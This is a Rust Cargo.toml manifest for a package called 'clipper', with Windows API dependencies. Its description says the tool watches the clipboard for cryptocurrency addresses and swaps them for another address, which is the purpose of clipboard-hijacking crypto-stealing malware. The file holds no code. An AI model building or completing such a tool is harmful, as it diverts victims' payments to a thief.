[package]
name = "clipper"
version = "0.1.0"
authors = ["sky <skyy@macaw.me>"]
description = "Regularly checks the clipboard for know crypto addresses and replaces it with another address"
readme = "README.md"
edition = "2021"

[dependencies]
regex = "1.11.1"
winapi = { version = "0.3.9", features = ["heapapi", "winuser", "winbase"] }
